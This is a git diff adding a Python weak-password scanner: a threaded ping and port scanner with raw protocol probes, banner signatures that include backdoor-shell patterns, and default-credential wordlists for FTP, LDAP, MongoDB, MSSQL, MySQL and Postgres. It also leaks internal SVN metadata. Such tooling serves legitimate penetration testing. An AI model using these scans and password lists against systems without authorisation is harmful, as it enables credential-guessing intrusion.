diff --git a/Bruteforce/README.md b/Bruteforce/README.md new file mode 100644 index 0000000..e39c5fa --- /dev/null +++ b/Bruteforce/README.md @@ -0,0 +1,23 @@ +# bruteforce weak password +# ports&*weak password scanner. + +$ python bruteforce.py -h + + +usage: main.py [-h] [--ip IP] [--threads THREADS] [--P ISPING] + [--p USER_PORTS] [--file FILE] + + + +optional arguments: + -h, --help show this help message and exit + + --ip IP ip like 192.168.1.0/24 or 192.168.0.0/16 + + --threads THREADS Maximum threads, default 50 + + --P ISPING --P not mean no ping frist,default yes + + --p USER_PORTS --p scan ports;like 21,80,445 or 22-1000 + + --file FILE get ips or domains for this file diff --git a/Bruteforce/bruteforce.py b/Bruteforce/bruteforce.py new file mode 100644 index 0000000..5f603a4 --- /dev/null +++ b/Bruteforce/bruteforce.py @@ -0,0 +1,53 @@ +#coding=utf-8 +__author__ = 'unkonwn' +import argparse +from comm.printers import printPink,printRed,printGreen +from comm.config import * +from comm.portscan import * +from factorys.pluginFactory import * + + +#实例化config类 +c=config() + +if __name__ == '__main__': + #接受cmd参数 + parser = argparse.ArgumentParser(description='ports&*weak password scanner. teams:xdsec. author: wilson ') + parser.add_argument('--ip',action="store",required=False,dest="ip",type=str,help='ip like 192.168.1.0/24 or 192.168.0.0/16') + parser.add_argument("--threads",action="store",required=False,dest="threads",type=int,default=50,help='Maximum threads, default 50') + parser.add_argument("--P",action="store",required=False,dest="isping",type=str,default='yes',help='--P not mean no ping frist,default yes') + parser.add_argument("--p",action="store",required=False,dest="user_ports",type=str,default='',help='--p scan ports;like 21,80,445 or 22-1000') + parser.add_argument("--file",action="store",required=False,dest="file",type=str,help='get ips or domains for this file') + + args = parser.parse_args() + ip = args.ip + filename=args.file + + + #获取ip列表 + if ip: + ips=c.getips(ip) + file="result/%s.txt" %args.ip.replace("/","") + elif filename: + ips=c.file2list(filename) + filename=filename.split("/")[-1] + file="result/%s.txt" %filename + else: + print "error args";exit() + + isping=args.isping + user_posts=args.user_ports + threads=args.threads + + p=portscan(c,user_posts) + p.run(isping,threads,ips,file) + + #print p.ipdict,p.pinglist + plugins=pluginFactory(c) + for pluginname in plugins.pluginList: + #print pluginname + if pluginname: + pluginname.run(p.ipdict,p.pinglist,threads,file) + + + diff --git a/Bruteforce/comm/__init__.py b/Bruteforce/comm/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Bruteforce/comm/__init__.pyc b/Bruteforce/comm/__init__.pyc new file mode 100644 index 0000000..4d7c2e8 Binary files /dev/null and b/Bruteforce/comm/__init__.pyc differ diff --git a/Bruteforce/comm/config.py b/Bruteforce/comm/config.py new file mode 100644 index 0000000..0dd00e4 --- /dev/null +++ b/Bruteforce/comm/config.py @@ -0,0 +1,45 @@ +#coding=utf-8 +__author__ = 'wilson' +from IPy import IP +from comm.printers import printPink,printRed,printGreen + +class config(object): + + def getips(self,ip): + iplist=[] + try: + if "-" in ip.split(".")[3]: + startnum=int(ip.split(".")[3].split("-")[0]) + endnum=int(ip.split(".")[3].split("-")[1]) + for i in range(startnum,endnum): + iplist.append("%s.%s.%s.%s" %(ip.split(".")[0],ip.split(".")[1],ip.split(".")[2],i)) + else: + ips=IP(ip) + for i in ips: + iplist.append(str(i)) + + return iplist + + except: + printRed("[!] not a valid ip given. you should put ip like 192.168.1.0/24, 192.168.0.0/16,192.168.0.1-200") + exit() + + + def file2list(self,file): + iplist=[] + try: + fh = open(file) + for ip in fh.readlines(): + ip=ip.strip() + iplist.append(ip) + fh.close() + return iplist + except Exception, e: + print e + exit() + + + def write_file(self,file,contents): + f2 = open(file,'a+') + f2.write(contents) + f2.close() \ No newline at end of file diff --git a/Bruteforce/comm/config.pyc b/Bruteforce/comm/config.pyc new file mode 100644 index 0000000..b4040d8 Binary files /dev/null and b/Bruteforce/comm/config.pyc differ diff --git a/Bruteforce/comm/portscan.py b/Bruteforce/comm/portscan.py new file mode 100644 index 0000000..690de9e --- /dev/null +++ b/Bruteforce/comm/portscan.py @@ -0,0 +1,294 @@ +#coding=utf-8 +__author__ = 'wilson' +import sys +sys.path.append("../") +from comm.config import * +from comm.printers import printPink,printRed,printGreen + +import threading +from threading import Thread +from Queue import Queue +import platform +from subprocess import Popen, PIPE +import re +import time +import socket +socket.setdefaulttimeout(10) #设置了全局默认超时时间 + +class portscan(): + + """docstring for ClassName""" + def __init__(self,c,user_ports): + self.config=c + self.PROBES =[ + '\r\n\r\n', + 'GET / HTTP/1.0\r\n\r\n', + 'GET / \r\n\r\n', + '\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08', + '\x80\0\0\x28\x72\xFE\x1D\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xA0\0\x01\x97\x7C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', + '\x03\0\0\x0b\x06\xe0\0\0\0\0\0', + '\0\0\0\xa4\xff\x53\x4d\x42\x72\0\0\0\0\x08\x01\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1.0\0\x02MICROSOFT NETWORKS 1.03\0\x02MICROSOFT NETWORKS 3.0\0\x02LANMAN1.0\0\x02LM1.2X002\0\x02Samba\0\x02NT LANMAN 1.0\0\x02NT LM 0.12\0', + '\x80\x9e\x01\x03\x01\x00u\x00\x00\x00 \x00\x00f\x00\x00e\x00\x00d\x00\x00c\x00\x00b\x00\x00:\x00\x009\x00\x008\x00\x005\x00\x004\x00\x003\x00\x002\x00\x00/\x00\x00\x1b\x00\x00\x1a\x00\x00\x19\x00\x00\x18\x00\x00\x17\x00\x00\x16\x00\x00\x15\x00\x00\x14\x00\x00\x13\x00\x00\x12\x00\x00\x11\x00\x00\n\x00\x00\t\x00\x00\x08\x00\x00\x06\x00\x00\x05\x00\x00\x04\x00\x00\x03\x07\x00\xc0\x06\x00@\x04\x00\x80\x03\x00\x80\x02\x00\x80\x01\x00\x80\x00\x00\x02\x00\x00\x01\xe4i<+\xf6\xd6\x9b\xbb\xd3\x81\x9f\xbf\x15\xc1@\xa5o\x14,M \xc4\xc7\xe0\xb6\xb0\xb2\x1f\xf9)\xe8\x98', + '\x16\x03\0\0S\x01\0\0O\x03\0?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\0\0(\0\x16\0\x13\0\x0a\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0', + '< NTP/1.2 >\n', + '< NTP/1.1 >\n', + '< NTP/1.0 >\n', + '\0Z\0\0\x01\0\0\0\x016\x01,\0\0\x08\0\x7F\xFF\x7F\x08\0\0\0\x01\0 \0:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\04\xE6\0\0\0\x01\0\0\0\0\0\0\0\0(CONNECT_DATA=(COMMAND=version))', + '\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00', + '\0\0\0\0\x44\x42\x32\x44\x41\x53\x20\x20\x20\x20\x20\x20\x01\x04\0\0\0\x10\x39\x7a\0\x01\0\0\0\0\0\0\0\0\0\0\x01\x0c\0\0\0\0\0\0\x0c\0\0\0\x0c\0\0\0\x04', + '\x01\xc2\0\0\0\x04\0\0\xb6\x01\0\0\x53\x51\x4c\x44\x42\x32\x52\x41\0\x01\0\0\x04\x01\x01\0\x05\0\x1d\0\x88\0\0\0\x01\0\0\x80\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x08\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x01\0\0\x40\0\0\0\x40\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x02\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x08\0\0\0\x01\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\x01\x04\0\0\x01\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x20\x20\x20\x20\x20\x20\x20\x20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xe4\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f', + '\x41\0\0\0\x3a\x30\0\0\xff\xff\xff\xff\xd4\x07\0\0\0\0\0\0test.$cmd\0\0\0\0\0\xff\xff\xff\xff\x1b\0\0\0\x01serverStatus\0\0\0\0\0\0\0\xf0\x3f\0' + ] + self.SIGNS =self.config.file2list("conf/signs.conf") + self.ports=[] + self.getports(user_ports) + self.lock = threading.Lock() + self.pinglist=[] + self.q=Queue() + self.sp=Queue() + self.signs=self.prepsigns() + + self.ipdict={} + self.ipdict['ldap']=[] + self.ipdict['mysql']=[] + self.ipdict['mssql']=[] + self.ipdict['ftp']=[] + self.ipdict['ssh']=[] + self.ipdict['smb']=[] + self.ipdict['vnc']=[] + self.ipdict['pop3']=[] + self.ipdict['rsync']=[] + self.ipdict['http']=[] + self.ipdict['https']=[] + self.ipdict['mongodb']=[] + self.ipdict['postgres']=[] + self.ipdict['redis']=[] + self.ipdict['ssl']=[] + self.ipdict['Unknown']=[] + + + #获取扫描端口列表 + def getports(self,user_ports): + if user_ports=='': + self.ports=[21,22,23,80,81,443,389,445,843,873,1043,1099,1194,1433,1434,1521,2601,2604,3306,3307,3128,3389,3812,4440,4848,5432,5900,5901,5902,5903,6082,6000,6379,7001,7002,8080,8181,8888,8090,8000,8008,8009,8081,8088,8089,9000,9080,9043,9090,9091,9200,9528,10000,11211,10022,15000,16000,22022,22222,27017,28017,17017,18017,11321,50060] + else: + try: + if user_ports.find(",")>0: + for port in user_ports.split(','): + self.ports.append(int(port)) + + elif user_ports.find("-")>0: + startport=int(user_ports.split('-')[0]) + endport=int(user_ports.split('-')[1]) + for i in xrange(startport,endport+1): + self.ports.append(i) + else: + self.ports.append(int(user_ports)) + except : + printRed('[!] not a valid ports given. you should put ip like 22,80,1433 or 22-1000') + exit() + + #ping扫描函数 + def pinger(self): + while True: + ip=self.q.get() + if platform.system()=='Linux': + p=Popen(['ping','-c 2',ip],stdout=PIPE) + m = re.search('(\d)\sreceived', p.stdout.read()) + try: + if m.group(1)!='0': + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + except:pass + + if platform.system()=='Darwin': + import commands + p=commands.getstatusoutput("ping -c 2 "+ip) + m = re.findall('ttl', p[1]) + try: + if m: + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + except:pass + + if platform.system()=='Windows': + p=Popen('ping -n 2 ' + ip, stdout=PIPE) + m = re.findall('TTL', p.stdout.read()) + if m: + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + self.q.task_done() + + + def pingscan(self,isping,threads,ips): + starttime=time.time() + friststarttime=time.time() + print "[*] start Scanning at %s" % time.ctime() + #isping=='no' 就禁ping扫描 + #默认ping 扫描 + if isping=='yes': + print "Scanning for live machines..." + for i in xrange(threads): + t = Thread(target=self.pinger) + t.setDaemon(True) + t.start() + for ip in ips: + self.q.put(ip) + + self.q.join() + + else: + self.pinglist=ips + + if len(self.pinglist)==0: + print "not find any live machine - -|||" + exit() + + print "[*] Scanning for live machines done,it has Elapsed time:%s " % (time.time()-starttime) + + + + def prepsigns(self): + signlist=[] + for item in self.SIGNS: + (label,pattern)=item.split('|',2) + sign=(label,pattern) + signlist.append(sign) + return signlist + + def matchbanner(self,banner,slist): + #print banner + for item in slist: + p=re.compile(item[1]) + #print item[1] + if p.search(banner)!=None: + return item[0] + return 'Unknown' + + + #扫端口及其对应服务类型函数 + def scanports(self): + while True: + ip,port=self.sp.get() + #print ip,port + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + #判断端口的服务类型 + service='Unknown' + try: + s.connect((ip,port)) + except: + self.sp.task_done() + continue + + try: + result = s.recv(256) + service=self.matchbanner(result,self.signs) + except: + for probe in self.PROBES: + #print probe + try: + s.close() + sd=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sd.settimeout(5) + sd.connect((ip,port)) + sd.send(probe) + except: + continue + try: + result=sd.recv(256) + service=self.matchbanner(result,self.signs) + if service!='Unknown': + break + except: + continue + + if service not in self.ipdict: + self.ipdict[service]=[] + self.ipdict[service].append(ip+':'+str(port)) + self.lock.acquire() + printRed("%s opening %s\r\n" %(ip,port)) + self.lock.release() + else: + self.ipdict[service].append(ip+':'+str(port)) + self.lock.acquire() + printRed("%s opening %s\r\n" %(ip,port)) + self.lock.release() + + self.sp.task_done() + + + def portsscan(self,threads,file): + print "Scanning ports now..." + print "[*] start Scanning live machines' ports at %s" % time.ctime() + starttime=time.time() + + for i in xrange(threads): + st=Thread(target=self.scanports) + st.setDaemon(True) + st.start() + + for scanip in self.pinglist: + for port in self.ports: + self.sp.put((scanip,port)) + self.sp.join() + print "[*] Scanning ports done,it has Elapsed time:%s " % (time.time()-starttime) + #将服务端口 信息 记录文件 + for name in self.ipdict.keys(): + if len(self.ipdict[name]): + contents=str(name)+' service has:\n'+' '+str(self.ipdict[name])+'\n' + self.config.write_file(contents=contents,file=file) + + + #处理没有识别的服务 + def handleunknown(self): + for ip in self.ipdict['Unknown']: + #print ip + try: + if str(ip).split(':')[1]=='389': + self.ipdict['ldap'].append(ip) + if str(ip).split(':')[1]=='445': + self.ipdict['smb'].append(ip) + if str(ip).split(':')[1] in ['3306','3307','3308','3309']: + self.ipdict['mysql'].append(ip) + if str(ip).split(':')[1]=='1433': + self.ipdict['mssql'].append(ip) + if str(ip).split(':')[1] in ['10022','22']: + self.ipdict['ssh'].append(ip) + if str(ip).split(':')[1]=='27017': + self.ipdict['mongodb'].append(ip) + if str(ip).split(':')[1]=='110': + self.ipdict['pop3'].append(ip) + if str(ip).split(':')[1]=='5432': + self.ipdict['postgres'].append(ip) + if str(ip).split(':')[1]=='443': + self.ipdict['ssl'].append(ip) + if str(ip).split(':')[1]=='873': + self.ipdict['rsync'].append(ip) + if str(ip).split(':')[1]=='6379': + self.ipdict['redis'].append(ip) +# if str(ip).split(':')[1]=='21': +# self.ipdict['ftp'].append(ip) + except Exception as e: + print e + #处理被识别为http的mongo + for ip in self.ipdict['http']: + if str(ip).split(':')[1]=='27017': + self.ipdict['http'].remove(ip) + self.ipdict['mongodb'].append(ip) + + def run(self,isping,threads,ips,file): + self.pingscan(isping,threads,ips) + self.portsscan(threads,file) + self.handleunknown() + + + + + + diff --git a/Bruteforce/comm/portscan.pyc b/Bruteforce/comm/portscan.pyc new file mode 100644 index 0000000..cb8e5ba Binary files /dev/null and b/Bruteforce/comm/portscan.pyc differ diff --git a/Bruteforce/comm/printers.py b/Bruteforce/comm/printers.py new file mode 100644 index 0000000..8203b59 --- /dev/null +++ b/Bruteforce/comm/printers.py @@ -0,0 +1,78 @@ +import ctypes,sys +import platform + +if platform.system()=='Linux' or platform.system()=='Darwin': + class colors: + BLACK = '\033[0;30m' + DARK_GRAY = '\033[1;30m' + LIGHT_GRAY = '\033[0;37m' + BLUE = '\033[0;34m' + LIGHT_BLUE = '\033[1;34m' + GREEN = '\033[0;32m' + LIGHT_GREEN = '\033[1;32m' + CYAN = '\033[0;36m' + LIGHT_CYAN = '\033[1;36m' + RED = '\033[0;31m' + LIGHT_RED = '\033[1;31m' + PURPLE = '\033[0;35m' + LIGHT_PURPLE = '\033[1;35m' + BROWN = '\033[0;33m' + YELLOW = '\033[1;33m' + WHITE = '\033[1;37m' + DEFAULT_COLOR = '\033[00m' + RED_BOLD = '\033[01;31m' + ENDC = '\033[0m' + + def printRed(mess): + mess=mess.strip('\r\n') + print colors.RED + mess + colors.ENDC + + def printPink(mess): + mess=mess.strip('\r\n') + print colors.BLUE + mess+ colors.ENDC + + def printGreen(mess): + mess=mess.strip('\r\n') + print colors.GREEN + mess + colors.ENDC + + +if platform.system()=='Windows': + STD_INPUT_HANDLE = -10 + STD_OUTPUT_HANDLE = -11 + STD_ERROR_HANDLE = -12 + + FOREGROUND_BLACK = 0x0 + FOREGROUND_BLUE = 0x01 # text color contains blue. + FOREGROUND_GREEN = 0x02 # text color contains green. + FOREGROUND_RED = 0x04 # text color contains red. + + FOREGROUND_INTENSITY = 0x08 # text color is intensified. + BACKGROUND_BLUE = 0x10 # background color contains blue. + BACKGROUND_GREEN = 0x20 # background color contains green. + BACKGROUND_RED = 0x40 # background color contains red. + BACKGROUND_INTENSITY = 0x80 # background color is intensified. + + + std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE) + + def set_cmd_text_color(color, handle=std_out_handle): + Bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color) + return Bool + + def resetColor(): + set_cmd_text_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE) + + def printRed(mess): + set_cmd_text_color(FOREGROUND_RED | FOREGROUND_INTENSITY) + sys.stdout.write(mess) + resetColor() + + def printPink(mess): + set_cmd_text_color(FOREGROUND_RED | FOREGROUND_BLUE| FOREGROUND_INTENSITY) + print(mess) + resetColor() + + def printGreen(mess): + set_cmd_text_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY) + sys.stdout.write(mess) + resetColor() diff --git a/Bruteforce/comm/printers.pyc b/Bruteforce/comm/printers.pyc new file mode 100644 index 0000000..1995bec Binary files /dev/null and b/Bruteforce/comm/printers.pyc differ diff --git a/Bruteforce/conf/.DS_Store b/Bruteforce/conf/.DS_Store new file mode 100644 index 0000000..5008ddf Binary files /dev/null and b/Bruteforce/conf/.DS_Store differ diff --git a/Bruteforce/conf/.svn/all-wcprops b/Bruteforce/conf/.svn/all-wcprops new file mode 100644 index 0000000..37787f1 --- /dev/null +++ b/Bruteforce/conf/.svn/all-wcprops @@ -0,0 +1,11 @@ +K 25 +svn:wc:ra_dav:version-url +V 43 +/svn/asoc/!svn/ver/2793/trunk/portScan/conf +END +config.txt +K 25 +svn:wc:ra_dav:version-url +V 54 +/svn/asoc/!svn/ver/2793/trunk/portScan/conf/config.txt +END diff --git a/Bruteforce/conf/.svn/entries b/Bruteforce/conf/.svn/entries new file mode 100644 index 0000000..0dd56a2 --- /dev/null +++ b/Bruteforce/conf/.svn/entries @@ -0,0 +1,62 @@ +10 + +dir +3928 +http://weisen.cws@sources.alipay.net/svn/asoc/trunk/portScan/conf +http://weisen.cws@sources.alipay.net/svn/asoc + + + +2014-12-16T07:44:40.829054Z +2793 +pengliu.lp + + + + + + + + + + + + + + +4b2b8d61-1d8c-441e-9e62-9f354fa0bc87 + +config.txt +file + + + + +2015-08-28T10:59:17.000000Z +fedd5f2201b8a8c4cb5eb448e116d05b +2014-12-16T07:44:40.829054Z +2793 +pengliu.lp + + + + + + + + + + + + + + + + + + + + + +72 + diff --git a/Bruteforce/conf/.svn/text-base/config.txt.svn-base b/Bruteforce/conf/.svn/text-base/config.txt.svn-base new file mode 100644 index 0000000..a1896d4 --- /dev/null +++ b/Bruteforce/conf/.svn/text-base/config.txt.svn-base @@ -0,0 +1,7 @@ + +[global] +task_type = 1 + + +[global] +logfile = ./log/log.txt diff --git a/Bruteforce/conf/ftp.conf b/Bruteforce/conf/ftp.conf new file mode 100644 index 0000000..4ce1ad1 --- /dev/null +++ b/Bruteforce/conf/ftp.conf @@ -0,0 +1,72 @@ +ftp:ftp@163.com +ftp:ftp +ftp:1 +ftp:12 +ftp:123 +ftp:1234 +ftp:12345 +ftp:123456 +ftp:1234567 +ftp:12345678 +ftp:123456789 +ftp:1234567890 +ftp:654321 +ftp:54321 +ftp:00000000 +ftp:88888888 +ftp:pass +ftp:password +ftp:passwd +ftp:!@#$%^ +ftp:1q2w3e +ftp:qawsed +ftp:pwd +ftp:1qaz2ws3e4 +ftp:qazwsxedc +ftp:!@#$%^&* +ftp:ftp21 +ftp:ftppass +ftp:ftp221 +ftp:ftppassword +ftp:ftppasswd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123123 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/ldapd.conf b/Bruteforce/conf/ldapd.conf new file mode 100644 index 0000000..0c6e377 --- /dev/null +++ b/Bruteforce/conf/ldapd.conf @@ -0,0 +1,27 @@ +Anonymous: +Manager:123456 +Manager:secret +Manager:1 +Manager:12 +Manager:123 +Manager:1234 +Manager:12345 +Manager:123456 +Manager:1234567 +Manager:12345678 +Manager:123456789 +Manager:1234567890 +Manager:654321 +Manager:54321 +Manager:00000000 +Manager:88888888 +Manager:pass +Manager:password +Manager:passwd +Manager:!@#$%^ +Manager:1q2w3e +Manager:qawsed +Manager:pwd +Manager:1qaz2ws3e4 +Manager:qazwsxedc +Manager:!@#$%^&* \ No newline at end of file diff --git a/Bruteforce/conf/mongodb.conf b/Bruteforce/conf/mongodb.conf new file mode 100644 index 0000000..00db698 --- /dev/null +++ b/Bruteforce/conf/mongodb.conf @@ -0,0 +1,115 @@ +anonymous: +mongodb:1 +mongodb:12 +mongodb:123 +mongodb:1234 +mongodb:12345 +mongodb:123456 +mongodb:1234567 +mongodb:12345678 +mongodb:123456789 +mongodb:1234567890 +mongodb:654321 +mongodb:54321 +mongodb:mongodb +mongodb:00000000 +mongodb:88888888 +mongodb:pass +mongodb:password +mongodb:passwd +mongodb:!@#$%^ +mongodb:1q2w3e +mongodb:qawsed +mongodb:pwd +mongodb:1qaz2ws3e4 +mongodb:qazwsxedc +mongodb:!@#$%^&* +mongodb:rootpass +mongodb:rootpassword +mongodb:rootpasswd +root:1 +root:12 +root:root +root:root123 +root:root123456 +root:123 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root:pass +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:test +root:qwe123 +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root123 +root:root123456 +root:rootpass +root:rootpassword +root:rootpasswd +root:admin +root:admin123 +root:- +root:_ +root:1qaz2wsx +root:666666 +root:888888 +root:123123 +root:toor +root:123abc +root:passw0rd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/mssql.conf b/Bruteforce/conf/mssql.conf new file mode 100644 index 0000000..8c8042a --- /dev/null +++ b/Bruteforce/conf/mssql.conf @@ -0,0 +1,33 @@ +sa:1 +sa: +sa:sa +sa:sa123 +sa:12 +sa:123 +sa:1234 +sa:12345 +sa:123456 +sa:1234567 +sa:12345678 +sa:123456789 +sa:1234567890 +sa:654321 +sa:54321 +sa:00000000 +sa:88888888 +sa:pass +sa:password +sa:passwd +sa:!@#$%^ +sa:1q2w3e +sa:qawsed +sa:pwd +sa:1qaz2ws3e4 +sa:qazwsxedc +sa:!@#$%^&* +sa:sa1433 +sa:sapass +sa:sa1434 +sa:sapassword +sa:sapasswd +sa:aS6kR9auNM diff --git a/Bruteforce/conf/mysql.conf b/Bruteforce/conf/mysql.conf new file mode 100644 index 0000000..1ebee22 --- /dev/null +++ b/Bruteforce/conf/mysql.conf @@ -0,0 +1,75 @@ +root:1 +root:12 +root:123 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root: +root:root +root:root123 +root:root123456 +root:pass +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root3306 +root:rootpass +root:root3307 +root:rootpassword +root:rootpasswd +mysql:1 +mysql:12 +mysql:123 +mysql:1234 +mysql:12345 +mysql:123456 +mysql:1234567 +mysql:12345678 +mysql:123456789 +mysql:1234567890 +mysql:654321 +mysql:54321 +mysql:00000000 +mysql:mysql +mysql:88888888 +mysql:pass +mysql:password +mysql:passwd +mysql:!@#$%^ +mysql:1q2w3e +mysql:qawsed +mysql:pwd +mysql:1qaz2ws3e4 +mysql:qazwsxedc +mysql:!@#$%^&* +mysql:root3306 +mysql:rootpass +mysql:root3307 +mysql:rootpassword +mysql:rootpasswd +test:1 +test:123123 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123456789 +test:test +test:654321 \ No newline at end of file diff --git a/Bruteforce/conf/pop3.conf b/Bruteforce/conf/pop3.conf new file mode 100644 index 0000000..e69de29 diff --git a/Bruteforce/conf/postgres.conf b/Bruteforce/conf/postgres.conf new file mode 100644 index 0000000..2ba2c9f --- /dev/null +++ b/Bruteforce/conf/postgres.conf @@ -0,0 +1,64 @@ +root:1 +root:12 +root:123 +root:x90x00 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root:root +root:root123 +root:root123456 +root:pass +root:motianlun +root:mofashi +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root3306 +root:rootpass +root:root3307 +root:rootpassword +root:rootpasswd +postgres:1 +postgres:12 +postgres:123 +postgres:1234 +postgres:12345 +postgres:123456 +postgres:1234567 +postgres:12345678 +postgres:123456789 +postgres:1234567890 +postgres:postgres +postgres:654321 +postgres:54321 +postgres:88888888 +postgres:pass +postgres:password +postgres:passwd +postgres:!@#$%^ +postgres:1q2w3e +postgres:qawsed +postgres:pwd +postgres:1qaz2ws3e4 +postgres:qazwsxedc +postgres:!@#$%^&* +postgres:postgres654321 +postgres:postgres123456 +postgres:postgres123 +postgres:postgrespassword +postgres:postgrespasswd \ No newline at end of file diff --git a/Bruteforce/conf/signs.conf b/Bruteforce/conf/signs.conf new file mode 100644 index 0000000..080e022 --- /dev/null +++ b/Bruteforce/conf/signs.conf @@ -0,0 +1,80 @@ +http|^HTTP.* +http|^HTTP/0. +http|^HTTP/1. +http|.* +http|.* +http|.* +http|Bad Request .Invalid URL. +redis|ERR unknown command +redis|ERR wrong number of arguments +mongodb|^.*version.....([\.\d]+) +pop3|.*POP3.* +pop3|.*pop3.* +ssh|SSH-2.0-OpenSSH.* +ssh|SSH-1.0-OpenSSH.* +ssh|.*ssh.* +backdoor-fxsvc|^500 Not Loged in +backdoor-shell|GET: command +backdoor-shell|sh: GET: +bachdoor-shell|[a-z]*sh: .* command not found +backdoor-shell|^bash[$#] +backdoor-shell|^sh[$#] +backdoor-cmdshell|^Microsoft Windows .* Copyright .*> +ftp|^220.*\n331 +ftp|^220.*\n530 +ftp|^220.*FTP +ftp|^220 .* Microsoft .* FTP +ftp|^220 Inactivity timer +ftp|^220 .* UserGate +ftp|^220(.*?) +ldap|^\x30\x0c\x02\x01\x01\x61 +ldap|^\x30\x32\x02\x01 +ldap|^\x30\x33\x02\x01 +ldap|^\x30\x38\x02\x01 +ldap|^\x30\x84 +ldap|^\x30\x45 +ldap|^\x30.* +smb|^\0\0\0.\xffSMBr\0\0\0\0.* +mssql|^\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.* +mssql|^\x05\x6e\x00 +mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.* 